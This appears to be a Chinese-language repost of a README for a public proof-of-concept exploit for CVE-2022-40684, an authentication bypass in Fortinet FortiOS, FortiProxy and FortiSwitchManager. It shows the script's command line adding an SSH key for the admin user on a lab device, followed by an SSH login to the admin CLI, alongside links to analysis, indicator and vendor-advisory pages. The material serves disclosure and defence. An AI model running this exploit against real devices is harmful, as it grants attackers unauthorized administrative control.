影响 Fortinet FortiOS、FortiProxy 和 FortiSwitchManager 设备的 CVE-2022-40684 的 POC。
漏洞的技术根本原因分析可以在我们的博客上找到: https ://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684
要分析 Fortinet 日志以获取妥协指标以及如何启用更深入的日志,请查看我们的 IOC 博客: https ://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
该 POC 滥用身份验证绕过漏洞为指定用户设置 SSH 密钥。
[email protected]kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
[email protected]kali:~# ssh [email protected]10.0.40.67
fortios_7_2_1 #
config Configure object. get
Get dynamic and system information. show
Show configuration. diagnose
Diagnose facility. execute
Execute static commands. alias
Execute alias commands. exit
Exit the CLI
更新到最新版本或按照 Fortinet PSIRT 中的说明进行缓解
https://www.fortiguard.com/psirt/FG-IR-22-377
项目地址:https://github.com/horizon3ai/CVE-2022-40684